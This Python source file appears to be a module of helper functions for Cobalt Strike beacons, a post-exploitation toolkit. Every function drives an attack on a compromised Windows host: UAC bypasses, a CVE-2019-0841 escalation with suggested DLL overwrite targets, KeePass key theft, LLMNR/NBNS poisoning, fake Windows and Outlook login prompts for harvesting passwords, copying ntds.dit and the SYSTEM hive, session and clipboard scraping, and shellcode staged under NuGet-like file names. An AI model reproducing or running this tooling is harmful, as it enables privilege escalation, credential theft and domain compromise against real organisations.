def elevate_token_shellcode_csharp(bid, shellcode): """ Elevate with token duplication bypass. Execute `shellcode` with a C# helper. """ aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) execute_shellcode = utils.basedir('tools/execute_shellcode.exe') execute_assembly = utils.basedir('tools/execute_assembly.exe') stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid)) #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid)) stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid)) package = r'{}\nuget.package'.format(helpers.guess_temp(bid)) helpers.upload_to(bid, execute_assembly, stage1) helpers.upload_to(bid, execute_shellcode, stage2) helpers.upload_to(bid, shellcode, package) command = 'Invoke-TokenDuplication -Binary {}'.format( powershell_quote(stage2)) aggressor.bpowerpick(bid, command) aggressor.brm(bid, stage1) aggressor.brm(bid, stage2) aggressor.brm(bid, package)
def run(bid, program, args=None, silent=False): # no args if not args: args = [] if program in assemblies: assembly = assemblies[program] args = helpers.eaq(args) if not silent: aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args)) aggressor.bexecute_assembly(bid, assembly, args, silent=True) elif program in powershell: script = powershell[program] aggressor.bpowershell_import(bid, script) if isinstance(args, list) or isinstance(args, tuple): args = ' '.join(powershell_quote(args)) aggressor.bpowerpick(bid, ' '.join(args)) elif program in callbacks: callback = callbacks[program] callback(bid, args, silent=silent) else: raise RuntimeError('Unrecognized program: {}'.format(program))
def import_network_recon(bid): """ Import NetworkRecon.ps1 """ aggressor.bpowershell_import(bid, utils.basedir('powershell/NetworkRecon.ps1'))
def import_domain_recon(bid): """ Import DomainRecon.ps1 """ aggressor.bpowershell_import(bid, utils.basedir('powershell/DomainRecon.ps1'))
def _(bid, runtime=99999, *args): aggressor.bpowershell_import( bid, utils.basedir('powershell/Inveigh/Inveigh.ps1')) aggressor.bpowerpick( bid, "Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}" .format(runtime, ' '.join(args)))
def elevate_slui_command(bid, command): """ Elevate with slui bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) aggressor.bpowerpick( bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid): # KeePassConfig aggressor.bpowershell_import(bid, utils.basedir('powershell/KeePassconfig.ps1')) aggressor.bpowerpick(bid, "Find-KeePassconfig") # KeeThief aggressor.bpowershell_import(bid, utils.basedir('powershell/KeeThief.ps1')) aggressor.bpowerpick(bid, "Get-KeePassDatabaseKey -Verbose")
def elevate_eventvwr_command(bid, command): """ Elevate with eventvwr bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1')) aggressor.bpowerpick( bid, 'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_wscript_command(bid, command): """ Elevate with wscript bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')) aggressor.bpowerpick( bid, 'Invoke-WScriptBypassUAC -payload {}'.format( powershell_quote(command)))
def _(bid, out=None): aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1')) command = 'Get-AccountSPNs' if out: # output to file command += ' > {}'.format(powershell_quote(out)) aggressor.bpowerpick(bid, command)
def elevate_cve_2019_0841(bid, target, overwrite=None): r""" Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally overwrite 'target' with 'overwrite'. Good overwrite options: - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate) - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually) """ native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1') edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*' settings_dat = r'\Settings\settings.dat' command = helpers.code_string(r""" # Stop Edge echo "[.] Stopping Edge" $process = Get-Process -Name MicrosoftEdge 2>$null if ($process) {{ $process | Stop-Process }} sleep 3 # Hardlink $edge_dir = Resolve-Path {edge_dir} $settings_dat = $edge_dir.Path + '{settings_dat}' echo "[.] Making Hardlink from $settings_dat to {target}" rm $settings_dat Native-HardLink -Verbose -Link $settings_dat -Target {target} # Start Edge echo "[.] Starting Edge" Start Microsoft-Edge: sleep 3 # Stop it again echo "[.] Stopping Edge" $process = Get-Process -Name MicrosoftEdge 2>$null if ($process) {{ $process | Stop-Process }} echo "[+] All Finished!" echo "[.] New ACLs:" Get-Acl {target} | Format-List """.format(edge_dir=edge_dir, settings_dat=settings_dat, target=powershell_quote(target))) aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True) aggressor.bpowerpick(bid, command, silent=True) if overwrite: helpers.upload_to(bid, overwrite, target) helpers.explorer_stomp(bid, target)
def _(bid, *ranges): aggressor.bpowershell_import( bid, utils.basedir( 'powershell/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1')) command = '' for r in ranges: command += 'Invoke-ReverseDnsLookup {}\n'.format(r) aggressor.bpowerpick(bid, command)
def _(bid, runtime=99999, *args): aggressor.bpowershell_import( bid, utils.basedir('powershell/Inveigh/Inveigh.ps1')) aggressor.btask( bid, 'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft' ) aggressor.bpowerpick( bid, r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}" .format(runtime, ' '.join(args)))
def _(bid, title='Windows Security', message='Please re-enter your user credentials.'): aggressor.bpowershell_import( bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1')) command += helpers.code_string(r""" $out = ShowPrompt "{}" "{}" if ($out) {{ $out }} else {{ echo "Didn't get the credentials" }} """.format(title, message)) # powerpick doesn't work with $host.ui aggressor.bpowershell(bid, command, silent=True)
def _(bid): ntds_source = r'C:\Windows\ntds\ntds.dit' system_source = r'C:\Windows\system32\config\SYSTEM' ntds_dest = r'C:\Windows\temp\ntds.dit' system_dest = r'C:\Windows\temp\SYSTEM' aggressor.bpowershell_import( bid, utils.basedir( 'powershell/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1')) command = helpers.code_string(r""" Invoke-NinjaCopy -Path "{}" -LocalDestination "{}" Invoke-NinjaCopy -Path "{}" -LocalDestination "{}" """.format(ntds_source, ntds_dest, system_source, system_dest)) aggressor.bpowerpick(bid, command) aggressor.blog2( bid, 'Files will be at "{}" and "{}"'.format(ntds_dest, system_dest))
def elevate_token_command(bid, command, *other_args): """ Elevate with token duplication bypass. Execute `command` with `arguments`. """ command, *arguments = command.split() aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) powershell = 'Invoke-TokenDuplication -Binary {} '.format( powershell_quote(command)) if arguments: powershell += '-Arguments {} '.format( powershell_quote(' '.join(arguments))) if other_args: powershell += ' '.join(other_args) aggressor.bpowerpick(bid, powershell)
def _( bid, title='Microsoft Outlook', message='Your Outlook session has expired. Please re-enter your credentials.' ): aggressor.bpowershell_import( bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1')) command = helpers.code_string(r""" Stop-Process -Name OUTLOOK $out = ShowPrompt "{}" "{}" if ($out) {{ $out Start-Process outlook }} else {{ echo "Didn't get the credentials" }} """.format(title, message)) # powerpick doesn't work with $host.ui aggressor.bpowershell(bid, command, silent=True)
def _(bid): aggressor.bpowershell_import( bid, utils.basedir('powershell/Inveigh/Inveigh.ps1')) aggressor.bpowerpick(bid, 'Stop-Inveigh')
def _(bid): aggressor.bpowershell_import( bid, utils.basedir("powershell/Invoke-mimikittenz.ps1")) aggressor.bpowerpick(bid, "Invoke-mimikittenz")
def _(bid, *args): aggressor.bpowershell_import(bid, utils.basedir('powershell/Start-ClipboardMonitor.ps1')) aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(' '.join(powershell_quote(args))))
def import_host_recon(bid): """ Import HostRecon.ps1 """ aggressor.bpowershell_import(bid, utils.basedir('powershell/HostRecon.ps1'))
def import_script(bid, program): if program in powershell: script = powershell[program] aggressor.bpowershell_import(bid, script) else: raise RuntimeError('Not a known script: {}'.format(program))
def _(bid): aggressor.bpowershell_import( bid, utils.basedir('powershell/Invoke-CredLeak.ps1')) aggressor.bpowerpick(bid, 'Invoke-CredLeak')
def _(bid, *args): aggressor.bpowershell_import(bid, utils.basedir('powershell/SessionGopher.ps1')) aggressor.bpowerpick( bid, 'Invoke-SessionGopher ' + ' '.join(powershell_quote(args)))
def import_av_logs(bid): """ Import AVLogs.ps1 """ aggressor.bpowershell_import(bid, utils.basedir('powershell/AVLogs.ps1'))
def _(bid, *args): aggressor.bpowershell_import( bid, utils.basedir('powershell/Invoke-NetRipper.ps1')) aggressor.bpowerpick( bid, r'Invoke-NetRipper -LogLocation C:\Temp\ ' + ' '.join(powershell_quote(args)))